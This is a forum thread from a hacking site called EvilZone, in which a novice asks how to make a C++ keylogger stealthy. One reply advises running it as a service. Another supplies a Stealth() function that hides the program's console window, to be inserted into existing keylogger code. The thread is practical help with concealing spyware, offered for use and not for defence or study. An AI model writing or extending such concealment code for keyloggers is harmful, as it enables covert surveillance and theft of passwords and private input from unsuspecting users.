EvilZone

Programming and Scripting => C - C++ => : xthundemanx December 14, 2012, 06:58:26 AM

: C++ stealthy keylogger
: xthundemanx December 14, 2012, 06:58:26 AM
Okay, so I know how to make a normal keylogger.


I want to know how to make one that is...stealthy.
As in it can be minimized to taskbar...and still log the keystrokes..




Im fairly nooby, so I need help getting started up ..


How to proceed ?
: Re: C++ stealthy keylogger
: Kulverstukas December 14, 2012, 08:34:54 AM
Proceed by making it as a service, without windows popping up.
: Re: C++ stealthy keylogger
: Grand December 15, 2012, 10:28:08 AM
Search for
:
int Save (int key_stroke, char *file);and add this under that.
:
void Stealth();

This where you like to.


:
void Stealth()
{
  HWND stealth;
  AllocConsole();
  stealth = FindWindowA("ConsoleWindowClass", NULL);
  ShowWindow(stealth,0);
}